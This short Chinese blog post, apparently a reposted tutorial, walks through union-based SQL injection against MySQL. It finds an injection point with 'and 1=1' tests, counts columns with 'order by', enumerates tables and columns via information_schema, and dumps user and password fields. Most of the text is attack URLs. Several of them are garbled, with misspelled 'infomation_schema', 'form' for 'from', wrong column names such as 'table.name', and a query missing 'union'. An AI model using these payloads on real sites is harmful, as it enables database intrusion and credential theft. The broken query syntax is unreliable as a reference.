MYSQL高版本注入

MYSQL高版本注入

首先介绍一下数据库基本的infomation_schema表

table.schema (数据库)column.table(表列) table.name (表名) group_concat(查询所有)

mysql(5.0)版本之后就有infomation_schema表

首先我们需要找到注入点  根据老方法可在后面加上and 1=1   返回正常 and 1=2 返回不正常 可判断为有注入点

其次我们可以根据数据库的原理得知 id=正常值  返回正常页面    id=你乱输入数   返回不正常页面    可判断为有注入点

找注入点   

 url/?id=1 order by 1,2,3,4等   去最后一个正常返回页面值 可知道注入点

收集  用户名 数据库 系统版本 数据库版本

url/?id=-1 select user(),version(),database(),@@version_compile_os()     我们假设数据库名字为 A

查表名

url/?id=-1 union select  1,group_concat(table.name) form infomation_schema.tables where table.schema ='A'    我们假设表名为 B

查列名字段

url/?id=-1 union select  1,group_concat(column.table) form infomation_schema.column where table.name ='B'    我们假设字段有 user  passwd

爆字段

url/?id=-1 union select  1,user,passwd  form B    我们假设返回值 root  root

完成

 

 


版权声明:本文为qq_40683931原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。